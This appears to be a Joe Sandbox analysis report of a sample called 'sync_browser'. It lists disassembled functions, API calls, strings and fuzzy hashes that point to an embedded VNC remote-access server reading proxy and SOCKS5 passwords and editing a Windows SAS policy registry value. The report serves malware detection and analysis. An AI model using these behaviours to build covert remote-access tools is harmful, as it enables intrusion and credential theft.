Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorFileInfoLastSizeVersion
String ID: Fail: Using 32bit winvnc.exe with a 64bit driver? $\StringFileInfo\000004b0\ProductVersion$\StringFileInfo\040904b0\ProductVersion
API String ID: 752140088-134519983
Opcode ID: 00ed22fe1ca1a25bb662bc61b52b6084809bf4c045d17fe901cbd0028fd4bcc6
Instruction ID: 27a6040654ec7da9752e6fa43792604bf3df54ab08d90929dede82aaafadf780
Opcode Fuzzy Hash: 00ed22fe1ca1a25bb662bc61b52b6084809bf4c045d17fe901cbd0028fd4bcc6
Instruction Fuzzy Hash: 1F21A261B0DA46C1EA10BB62A8001B9E3A1EF85BD4FC40031DE4D07B7CEE6CE586C720

Function 00007FF74000B460 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 61COMMON

Download Yara Rule

APIs

_wgetenv.LIBCMT ref: 00007FF74000B479

Part of subcall function 00007FF7400B9500: _errno.LIBCMT ref: 00007FF7400B9515
Part of subcall function 00007FF7400B9500: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B9520

_wgetenv.LIBCMT ref: 00007FF74000B4B0
_wgetenv.LIBCMT ref: 00007FF74000B4E3
_wgetenv.LIBCMT ref: 00007FF74000B511

Strings

CONNECT_PASSWORD, xrefs: 00007FF74000B50A, 00007FF74000B51E
SOCKS5_PASSWORD, xrefs: 00007FF74000B4DC, 00007FF74000B4F0
SOCKS5_PASSWD, xrefs: 00007FF74000B4A9, 00007FF74000B4BD
HTTP_PROXY_PASSWORD, xrefs: 00007FF74000B472, 00007FF74000B486

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _wgetenv$_errno_invalid_parameter_noinfo
String ID: CONNECT_PASSWORD$HTTP_PROXY_PASSWORD$SOCKS5_PASSWD$SOCKS5_PASSWORD
API String ID: 1184729097-3964388033
Opcode ID: 75c89c269b5bdbccb324d11e52bf46f8eda89c740f1d11fad698b593103782f0
Instruction ID: 03c465ce336337a6fb8f678a29827b3565ecbf788bf778473d400521c75bc441
Opcode Fuzzy Hash: 75c89c269b5bdbccb324d11e52bf46f8eda89c740f1d11fad698b593103782f0
Instruction Fuzzy Hash: B621A621A1EA46C0FD65BB15F8916B4D2E0BF68B45FC84475DA0C463BAFE2CF941C260

Function 00007FF740033523 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58timethreadclipboardCOMMON

Download Yara Rule

APIs

KillTimer.USER32 ref: 00007FF74003352B
ChangeClipboardChain.USER32 ref: 00007FF740033540
GetCurrentThreadId.KERNEL32 ref: 00007FF7400335B1

Strings

vncdesktopsink.cpp : unset W8 hooks OK, xrefs: 00007FF740033564
vncdesktopsink.cpp : Unsethooks OK, xrefs: 00007FF7400335D3
vncdesktopsink.cpp : WM_DESTROY, xrefs: 00007FF7400335E5
vncdesktopsink.cpp : Unsethooks Failed, xrefs: 00007FF7400335CA
vncdesktopsink.cpp : unset SC hooks OK, xrefs: 00007FF740033588

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ChainChangeClipboardCurrentKillThreadTimer
String ID: vncdesktopsink.cpp : Unsethooks Failed$vncdesktopsink.cpp : Unsethooks OK$vncdesktopsink.cpp : WM_DESTROY$vncdesktopsink.cpp : unset SC hooks OK$vncdesktopsink.cpp : unset W8 hooks OK
API String ID: 3622578367-539335655
Opcode ID: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
Instruction ID: b98b27110481c90e89483f310b65fed7c782242e623bda8a1eed44deb6c8eba0
Opcode Fuzzy Hash: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
Instruction Fuzzy Hash: A821D1A2A1C982D2F75EBB20E9501F9E3A5FF44701FC84036C61E922B9DF3CB061C220

Function 00007FF740013BE0 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 40registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32 ref: 00007FF740013C1F
RegOpenKeyExA.ADVAPI32 ref: 00007FF740013C48
RegSetValueExA.ADVAPI32 ref: 00007FF740013C81
RegCloseKey.ADVAPI32 ref: 00007FF740013C8C
RegCloseKey.ADVAPI32 ref: 00007FF740013C97

Strings

SoftwareSASGeneration, xrefs: 00007FF740013C5C
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies, xrefs: 00007FF740013BE9
System, xrefs: 00007FF740013C33

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Close$CreateOpenValue
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
API String ID: 678895439-3579764778
Opcode ID: d324a7fd9c053fdbed078a6d8dbfb6b791194126c2f4355e782ae63509712a99
Instruction ID: a9a7c6c8976e16db0dcb0e54cc3955f4781294cd31a497684c6de3789d9257a4
Opcode Fuzzy Hash: d324a7fd9c053fdbed078a6d8dbfb6b791194126c2f4355e782ae63509712a99
Instruction Fuzzy Hash: D8112C71A1CA46C6EB50AB24F84865AB7A4FB84788F801131EA8D43B78DF3CE149CF10

Function 00007FF740013CB0 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32 ref: 00007FF740013CEF
RegOpenKeyExA.ADVAPI32 ref: 00007FF740013D18
RegDeleteValueA.ADVAPI32 ref: 00007FF740013D2E
RegCloseKey.ADVAPI32 ref: 00007FF740013D39
RegCloseKey.ADVAPI32 ref: 00007FF740013D44

Strings

SoftwareSASGeneration, xrefs: 00007FF740013D27
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies, xrefs: 00007FF740013CB9
System, xrefs: 00007FF740013D03

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Close$CreateDeleteOpenValue
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
API String ID: 2881815620-3579764778
Opcode ID: e69ca6185ab1a7843b6bf4ee7a75db947d055aaacf23707991ad0b828e0a2439
Instruction ID: 032e19579c9abf87115f48d04e9e3e2eb4d4df162a2aa23541514a30b510a418
Opcode Fuzzy Hash: e69ca6185ab1a7843b6bf4ee7a75db947d055aaacf23707991ad0b828e0a2439
Instruction Fuzzy Hash: 97013C31A1CB46C2EB50BB24F84456AB7A4FB84784F801131EA9D47B78EF3CE149CB10

Function 00007FF7400B9ABC Relevance: 13.6, APIs: 9, Instructions: 142COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7400B9AF3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B9AFF
_errno.LIBCMT ref: 00007FF7400B9B5A
_errno.LIBCMT ref: 00007FF7400B9B66
_errno.LIBCMT ref: 00007FF7400B9B9A
malloc.LIBCMT ref: 00007FF7400B9BFA
_errno.LIBCMT ref: 00007FF7400B9C1A
_errno.LIBCMT ref: 00007FF7400B9C76
free.LIBCMT ref: 00007FF7400B9C8E

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfofreemalloc
String ID:
API String ID: 3646291181-0
Opcode ID: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
Instruction ID: 003359c1125d1841ef422d886aa291dff10aa82e52e4dc9e273fdbdfa9e28043
Opcode Fuzzy Hash: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
Instruction Fuzzy Hash: A7519F22A0C242CAFB11BFA59540779A6A0EB457A4F944631EA1D077EBDF3CF4418721

Function 00007FF7400BAD6C Relevance: 13.6, APIs: 9, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

_lock.LIBCMT ref: 00007FF7400BAD95

Part of subcall function 00007FF7400C77D0: _amsg_exit.LIBCMT ref: 00007FF7400C77FA

DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7400BAF59,?,?,00000000,00007FF7400C77FF), ref: 00007FF7400BADC8
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7400BAF59,?,?,00000000,00007FF7400C77FF), ref: 00007FF7400BADE6
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7400BAF59,?,?,00000000,00007FF7400C77FF), ref: 00007FF7400BAE26
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7400BAF59,?,?,00000000,00007FF7400C77FF), ref: 00007FF7400BAE40
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7400BAF59,?,?,00000000,00007FF7400C77FF), ref: 00007FF7400BAE50
_initterm.LIBCMT ref: 00007FF7400BAE90
_initterm.LIBCMT ref: 00007FF7400BAEA3
ExitProcess.KERNEL32 ref: 00007FF7400BAEDC

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: DecodePointer$_initterm$ExitProcess_amsg_exit_lock
String ID:
API String ID: 3873167975-0
Opcode ID: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
Instruction ID: 962d7fc08af44a41131cffd28336eddf1a96e30e6194cc19088025f99c22b448
Opcode Fuzzy Hash: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
Instruction Fuzzy Hash: E0416D21A2DA42C1E654BB55F840239E2A5BF89784F844035DA6D47BBDEF3CF4588720

Function 00007FF7400C4BE4 Relevance: 13.6, APIs: 9, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7400C4C43
_errno.LIBCMT ref: 00007FF7400C4C79
_errno.LIBCMT ref: 00007FF7400C4C87
_errno.LIBCMT ref: 00007FF7400C4C90
_errno.LIBCMT ref: 00007FF7400C4CD1
_errno.LIBCMT ref: 00007FF7400C4CDB
_errno.LIBCMT ref: 00007FF7400C4CFE
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7400C4D09

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: d011579407d24bdfbb9aadfd6c0a3b9405857a9de314b67aa1550ae6c8c7f008
Instruction ID: 957a8ab927cceec16efa5841489cc8231253fc508accb41b193ae711709852c9
Opcode Fuzzy Hash: d011579407d24bdfbb9aadfd6c0a3b9405857a9de314b67aa1550ae6c8c7f008
Instruction Fuzzy Hash: 25315D2590D756C4EB68BB91944017DE661BF55BA0FD44632EA5D437FDDF2CF400C620

Function 00007FF740017AF0 Relevance: 13.5, APIs: 9, Instructions: 36fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF740017B0E
CloseHandle.KERNEL32 ref: 00007FF740017B18
CloseHandle.KERNEL32 ref: 00007FF740017B22
CloseHandle.KERNEL32 ref: 00007FF740017B2C
UnmapViewOfFile.KERNEL32 ref: 00007FF740017B3B
UnmapViewOfFile.KERNEL32 ref: 00007FF740017B4A
CloseHandle.KERNEL32 ref: 00007FF740017B59
CloseHandle.KERNEL32 ref: 00007FF740017B68
DeleteCriticalSection.KERNEL32 ref: 00007FF740017B72

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseHandle$FileUnmapView$CriticalDeleteSection
String ID:
API String ID: 4242051881-0
Opcode ID: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
Instruction ID: 3c7bd579b042ee36a43baaacd7850cb78d047aaeb701df1c68110e1efdaa5293
Opcode Fuzzy Hash: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
Instruction Fuzzy Hash: 43119025A1EA06C6EB54BF62D9A4678A364FF89F49B841031CA1E42378DF3DE485C360

Function 00007FF740024CDB Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF74002407F
CloseDesktop.USER32 ref: 00007FF7400240C2

Strings

vncservice.cpp : SelectDesktop , xrefs: 00007FF74002404B
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF740024060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF74002409A
vncclient.cpp : vncClientThread , xrefs: 00007FF740024029

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$CloseInputOpen
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 1367241101-3977938048
Opcode ID: 872beed9f37bc164325fc22219cfab8ab01e68070e7d89525f2677f35927d260
Instruction ID: 6c47ec5e74cb2739d829bca298d627f0397f845f468eeebb13edd2a504c5d6d3
Opcode Fuzzy Hash: 872beed9f37bc164325fc22219cfab8ab01e68070e7d89525f2677f35927d260
Instruction Fuzzy Hash: 73C1B122A0C691C5E750BB35C4587FEA7A1EB85B84F894039DA4C477B9CF38F844C720

Function 00007FF740027BB4 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 210COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF74002407F
CloseDesktop.USER32 ref: 00007FF7400240C2

Strings

vncservice.cpp : SelectDesktop , xrefs: 00007FF74002404B
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF740024060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF74002409A
vncclient.cpp : vncClientThread , xrefs: 00007FF740024029

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$CloseInputOpen
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 1367241101-3977938048
Opcode ID: 47734043b62fd5003f3baede982ab513a6c8474cbed8e2365ac637b1611529ad
Instruction ID: 48bbbfa3c3913e48e41e09ab6d0cce543135c5d17a56fb3f1e20a715bfc494d3
Opcode Fuzzy Hash: 47734043b62fd5003f3baede982ab513a6c8474cbed8e2365ac637b1611529ad
Instruction Fuzzy Hash: 5AB1BE22A0C691C5E751BB25C4587FEABA1EB85B44F994039DA4C477B9CF39F844CB20

Function 00007FF74002593D Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 201COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7400142A0: CreateThread.KERNEL32 ref: 00007FF740014336
Part of subcall function 00007FF7400142A0: ResumeThread.KERNEL32 ref: 00007FF74001434C

OpenInputDesktop.USER32 ref: 00007FF74002407F
CloseDesktop.USER32 ref: 00007FF7400240C2
GetTickCount.KERNEL32 ref: 00007FF7400241B3

Part of subcall function 00007FF74002C4E0: timeGetTime.WINMM ref: 00007FF74002C52A
Part of subcall function 00007FF74002C4E0: EnterCriticalSection.KERNEL32 ref: 00007FF74002C551
Part of subcall function 00007FF74002C4E0: RevertToSelf.ADVAPI32 ref: 00007FF74002C56C
Part of subcall function 00007FF74002C4E0: LeaveCriticalSection.KERNEL32 ref: 00007FF74002C57C

Strings

vncservice.cpp : SelectDesktop , xrefs: 00007FF74002404B
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF740024060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF74002409A
vncclient.cpp : vncClientThread , xrefs: 00007FF740024029

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalDesktopSectionThread$CloseCountCreateEnterInputLeaveOpenResumeRevertSelfTickTimetime
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 186452611-3977938048
Opcode ID: 240a7e3f24338c8b8522c66d0c22f1fbf1c168c0c99ca4f370a1211a49b204dc
